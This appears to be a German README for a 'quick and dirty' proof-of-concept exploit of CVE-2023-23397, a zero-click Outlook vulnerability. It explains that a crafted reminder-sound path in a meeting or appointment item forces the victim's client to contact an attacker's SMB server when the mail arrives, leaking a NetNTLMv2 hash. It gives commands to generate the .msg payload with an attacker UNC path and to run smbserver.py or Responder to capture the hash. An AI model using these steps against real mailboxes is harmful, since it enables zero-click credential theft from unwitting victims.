
Einfacher PoC der CVE-2023-23397-Sicherheitslücke mit dem per E-Mail gesendeten Payload.
Einfacher und schmutziger PoC der CVE-2023-23397-Sicherheitslücke, die den Outlook-Client betrifft.
Outlook leidet unter einem Mangel an Kontrolle über die Benutzereingaben, die es erlauben, den Sound einer Besprechungs- und Terminerinnerung zu konfigurieren. Tatsächlich kann ein Angreifer ein Opfer dazu zwingen, ohne jegliche Manipulation durch den Benutzer eine Verbindung zu seinem Server herzustellen (Zero-Click-Sicherheitslücke).
Ein Angreifer, der diese Sicherheitslücke ausnutzt, erhält einen NetNTLMv2-Digest basierend auf dem Passwort des gefangenen Benutzers über eine SMB-Anfrage. Die Anfrage wird ausgelöst, sobald die E-Mail im Posteingang eintrifft.
.msg-Payload.In einer Sitzung:
python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
In einer zweiten Sitzung (smbserver oder responder wie gewünscht).
smbserver.py -smb2support SHARE .
